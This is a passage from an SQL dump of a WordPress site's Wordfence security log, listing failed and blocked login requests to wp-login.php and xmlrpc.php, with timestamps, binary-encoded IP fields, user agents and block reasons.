AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10133,0.000000,1630697424.949842,'\0\0\0\0\0\0\0\0\0\0��`}��',0,200,0,0,0,'https://www.dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36','loginFailInvalidUsername',NULL,NULL),(10134,0.000000,1630697444.327352,'\0\0\0\0\0\0\0\0\0\0��\"���',0,503,0,0,0,'https://www.dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10135,0.000000,1630697446.314209,'\0\0\0\0\0\0\0\0\0\0��-@6�',0,503,0,0,0,'https://www.dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10136,0.000000,1630698322.437914,'\0\0\0\0\0\0\0\0\0\0��>m\\',0,503,0,0,0,'https://www.dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0) Gecko/20100101 Firefox/87.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10137,0.000000,1630698528.706445,'\0\0\0\0\0\0\0\0\0\0���;N�',0,200,0,0,0,'https://www.dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(10138,0.000000,1630698556.228864,'\0\0\0\0\0\0\0\0\0\0��j)�',0,503,0,0,0,'https://www.dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10139,0.000000,1630698963.110433,'\0\0\0\0\0\0\0\0\0\0��/�\'',0,503,0,0,0,'https://www.dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.163 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10140,0.000000,1630699303.083831,'\0\0\0\0\0\0\0\0\0\0���M',0,503,0,0,0,'https://www.dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10141,0.000000,1630699313.617569,'\0\0\0\0\0\0\0\0\0\0���;,',0,503,0,0,0,'https://www.dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10142,0.000000,1630699522.543577,'\0\0\0\0\0\0\0\0\0\0��mFd#',0,200,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; InfoPath.1; SV1; .NET CLR 3.8.36217; WOW64; en-US)','loginFailInvalidUsername',NULL,NULL),(10143,0.000000,1630699836.888578,'\0\0\0\0\0\0\0\0\0\0��ν��',0,503,0,0,0,'https://www.dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10144,0.000000,1630699932.955078,'\0\0\0\0\0\0\0\0\0\0���VE3',0,503,0,0,0,'https://www.dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10145,0.000000,1630699959.470535,'\0\0\0\0\0\0\0\0\0\0��6��-',0,503,0,0,0,'https://www.dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10146,0.000000,1630700518.156451,'\0\0\0\0\0\0\0\0\0\0��_�*�',0,503,0,0,0,'https://www.dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10147,0.000000,1630700551.678361,'\0\0\0\0\0\0\0\0\0\0��C�,6',0,503,0,0,0,'https://www.dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10148,0.000000,1630701106.079920,'\0\0\0\0\0\0\0\0\0\0��[ͯ#',0,503,0,0,0,'https://www.dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10149,0.000000,1630701113.786816,'\0\0\0\0\0\0\0\0\0\0��Cޘ�',0,503,0,0,0,'https://www.dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10150,0.000000,1630701322.288191,'\0\0\0\0\0\0\0\0\0\0���G',0,503,0,0,0,'https://www.dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10151,0.000000,1630701659.102987,'\0\0\0\0\0\0\0\0\0\0��>��',0,503,0,0,0,'https://www.dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10152,0.000000,1630701668.641313,'\0\0\0\0\0\0\0\0\0\0��\"���',0,503,0,0,0,'https://www.dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10153,0.000000,1630702164.478682,'\0\0\0\0\0\0\0\0\0\0���^�M',0,503,0,0,0,'https://www.dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10154,0.000000,1630702189.400776,'\0\0\0\0\0\0\0\0\0\0��#�K',0,503,0,0,0,'https://www.dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10155,0.000000,1630702216.880116,'\0\0\0\0\0\0\0\0\0\0��C�2',0,503,0,0,0,'https://www.dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10156,0.000000,1630702739.128705,'\0\0\0\0\0\0\0\0\0\0���W�\'',0,503,0,0,0,'https://www.dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10157,0.000000,1630703271.109623,'\0\0\0\0\0\0\0\0\0\0��E��}',0,503,0,0,0,'https://www.dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10158,0.000000,1630703274.188539,'\0\0\0\0\0\0\0\0\0\0��[�ȉ',0,503,0,0,0,'https://www.dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10159,0.000000,1630703609.284817,'\0\0\0\0\0\0\0\0\0\0��C�=�',0,503,0,0,0,'https://www.dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10160,0.000000,1630703775.517037,'\0\0\0\0\0\0\0\0\0\0��gR',0,503,0,0,0,'https://www.dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10161,0.000000,1630703786.070826,'\0\0\0\0\0\0\0\0\0\0��?�)',0,503,0,0,0,'https://www.dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10162,0.000000,1630704291.995337,'\0\0\0\0\0\0\0\0\0\0���X\Z�',0,503,0,0,0,'https://www.dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10163,0.000000,1630704294.298441,'\0\0\0\0\0\0\0\0\0\0���#��',0,503,0,0,0,'https://www.dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10164,0.000000,1630704378.210848,'\0\0\0\0\0\0\0\0\0\0��3Kȷ',0,503,0,0,0,'https://www.dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10165,0.000000,1630704787.725770,'\0\0\0\0\0\0\0\0\0\0���',0,503,0,0,0,'https://www.dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10166,0.000000,1630704793.854321,'\0\0\0\0\0\0\0\0\0\0��e%�',0,503,0,0,0,'https://www.dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10167,0.000000,1630705236.391368,'\0\0\0\0\0\0\0\0\0\0��\"��q',0,503,0,0,0,'https://www.dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10168,0.000000,1630705255.053370,'\0\0\0\0\0\0\0\0\0\0����d',0,503,0,0,0,'https://www.dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10169,0.000000,1630705674.494083,'\0\0\0\0\0\0\0\0\0\0���Avv',0,503,0,0,0,'https://www.dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10170,0.000000,1630705709.588711,'\0\0\0\0\0\0\0\0\0\0���,�1',0,503,0,0,0,'https://www.dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10171,0.000000,1630706197.516833,'\0\0\0\0\0\0\0\0\0\0���7]',0,503,0,0,0,'https://www.dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10172,0.000000,1630706202.421094,'\0\0\0\0\0\0\0\0\0\0���Ҝ4',0,503,0,0,0,'https://www.dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10173,0.000000,1630706426.462833,'\0\0\0\0\0\0\0\0\0\0��Rʬ�',0,503,0,0,0,'https://www.dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10174,0.000000,1630706685.315420,'\0\0\0\0\0\0\0\0\0\0��]��',0,503,0,0,0,'https://www.dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10175,0.000000,1630706686.581816,'\0\0\0\0\0\0\0\0\0\0��#�1�',0,503,0,0,0,'https://www.dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10176,0.000000,1630707157.310707,'\0\0\0\0\0\0\0\0\0\0������',0,503,0,0,0,'https://www.dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10177,0.000000,1630707185.874533,'\0\0\0\0\0\0\0\0\0\0���>n�',0,503,0,0,0,'https://www.dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10178,0.000000,1630707655.300183,'\0\0\0\0\0\0\0\0\0\0��3��',0,503,0,0,0,'https://www.dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10179,0.000000,1630707655.809565,'\0\0\0\0\0\0\0\0\0\0��r��',0,503,0,0,0,'https://www.dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10180,0.000000,1630707739.324401,'\0\0\0\0\0\0\0\0\0\0��/���',0,503,0,0,0,'https://www.dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10181,0.000000,1630708165.507852,'\0\0\0\0\0\0\0\0\0\0�����',0,503,0,0,0,'https://www.dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10182,0.000000,1630708179.495913,'\0\0\0\0\0\0\0\0\0\0��g��E',0,503,0,0,0,'https://www.dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10183,0.000000,1630708495.003845,'\0\0\0\0\0\0\0\0\0\0��H�*',0,503,0,0,0,'https://www.dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10184,0.000000,1630708715.281328,'\0\0\0\0\0\0\0\0\0\0��#ݵ�',0,503,0,0,0,'https://www.dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10185,0.000000,1630708716.435083,'\0\0\0\0\0\0\0\0\0\0���&V',0,503,0,0,0,'https://www.dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10186,0.000000,1630709239.576355,'\0\0\0\0\0\0\0\0\0\0���갞',0,503,0,0,0,'https://www.dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10187,0.000000,1630709767.041323,'\0\0\0\0\0\0\0\0\0\0��]Y��',0,503,0,0,0,'https://www.dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10188,0.000000,1630709817.500751,'\0\0\0\0\0\0\0\0\0\0���F��',0,503,0,0,0,'https://www.dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10189,0.000000,1630710274.973721,'\0\0\0\0\0\0\0\0\0\0���#��',0,503,0,0,0,'https://www.dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10190,0.000000,1630710305.118524,'\0\0\0\0\0\0\0\0\0\0���]�c',0,503,0,0,0,'https://www.dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10191,0.000000,1630710578.341383,'\0\0\0\0\0\0\0\0\0\0������',0,503,0,0,0,'https://www.dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10192,0.000000,1630710812.582761,'\0\0\0\0\0\0\0\0\0\0��r��',0,503,0,0,0,'https://www.dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10193,0.000000,1630710844.378723,'\0\0\0\0\0\0\0\0\0\0��gmш',0,503,0,0,0,'https://www.dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10194,0.000000,1630711389.510491,'\0\0\0\0\0\0\0\0\0\0��E���',0,503,0,0,0,'https://www.dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10195,0.000000,1630711390.349537,'\0\0\0\0\0\0\0\0\0\0��gQW',0,503,0,0,0,'https://www.dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10196,0.000000,1630711897.621972,'\0\0\0\0\0\0\0\0\0\0��C��',0,503,0,0,0,'https://www.dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10197,0.000000,1630711934.694846,'\0\0\0\0\0\0\0\0\0\0���V|�',0,503,0,0,0,'https://www.dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10198,0.000000,1630711936.322777,'\0\0\0\0\0\0\0\0\0\0��4$��',0,503,0,0,0,'https://www.dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10199,0.000000,1630712487.296021,'\0\0\0\0\0\0\0\0\0\0�����',0,503,0,0,0,'https://www.dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10200,0.000000,1630712493.954206,'\0\0\0\0\0\0\0\0\0\0��ca�',0,503,0,0,0,'https://www.dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10201,0.000000,1630712655.973597,'\0\0\0\0\0\0\0\0\0\0���G',0,503,0,0,0,'https://www.dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10202,0.000000,1630713060.937447,'\0\0\0\0\0\0\0\0\0\0���H�',0,503,0,0,0,'https://www.dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10203,0.000000,1630713094.570084,'\0\0\0\0\0\0\0\0\0\0���Q`',0,503,0,0,0,'https://www.dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10204,0.000000,1630713609.502232,'\0\0\0\0\0\0\0\0\0\0����?�',0,503,0,0,0,'https://www.dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0) Gecko/20100101 Firefox/87.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10205,0.000000,1630713628.688565,'\0\0\0\0\0\0\0\0\0\0�����',0,503,0,0,0,'https://www.dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10206,0.000000,1630713635.667620,'\0\0\0\0\0\0\0\0\0\0��>�',0,503,0,0,0,'https://www.dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10207,0.000000,1630714211.901105,'\0\0\0\0\0\0\0\0\0\0��\"���',0,503,0,0,0,'https://www.dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10208,0.000000,1630714218.631115,'\0\0\0\0\0\0\0\0\0\0��\"V��',0,503,0,0,0,'https://www.dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10209,0.000000,1630714756.996547,'\0\0\0\0\0\0\0\0\0\0���\">T',0,503,0,0,0,'https://www.dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10210,0.000000,1630714776.913228,'\0\0\0\0\0\0\0\0\0\0��.e��',0,503,0,0,0,'https://www.dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10211,0.000000,1630714797.928924,'\0\0\0\0\0\0\0\0\0\0���c/',0,503,0,0,0,'https://www.dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10212,0.000000,1630715379.729722,'\0\0\0\0\0\0\0\0\0\0����z�',0,503,0,0,0,'https://www.dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10213,0.000000,1630715382.302878,'\0\0\0\0\0\0\0\0\0\0��gmш',0,503,0,0,0,'https://www.dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10214,0.000000,1630715985.366185,'\0\0\0\0\0\0\0\0\0\0���;!�',0,503,0,0,0,'https://www.dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10215,0.000000,1630715990.796332,'\0\0\0\0\0\0\0\0\0\0����&�',0,503,0,0,0,'https://www.dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10216,0.000000,1630716579.206620,'\0\0\0\0\0\0\0\0\0\0��?�)',0,503,0,0,0,'https://www.dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10217,0.000000,1630716580.692239,'\0\0\0\0\0\0\0\0\0\0��#�^_',0,503,0,0,0,'https://www.dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10218,0.000000,1630716874.559277,'\0\0\0\0\0\0\0\0\0\0���a�',0,503,0,0,0,'https://www.dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.117 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10219,0.000000,1630717190.618589,'\0\0\0\0\0\0\0\0\0\0��l���',0,503,0,0,0,'https://www.dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10220,0.000000,1630717196.590831,'\0\0\0\0\0\0\0\0\0\0��t>f�',0,503,0,0,0,'https://www.dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10221,0.000000,1630717907.534467,'\0\0\0\0\0\0\0\0\0\0���C�u',0,503,0,0,0,'https://www.dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10222,0.000000,1630717910.968618,'\0\0\0\0\0\0\0\0\0\0���]��',0,503,0,0,0,'https://www.dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security 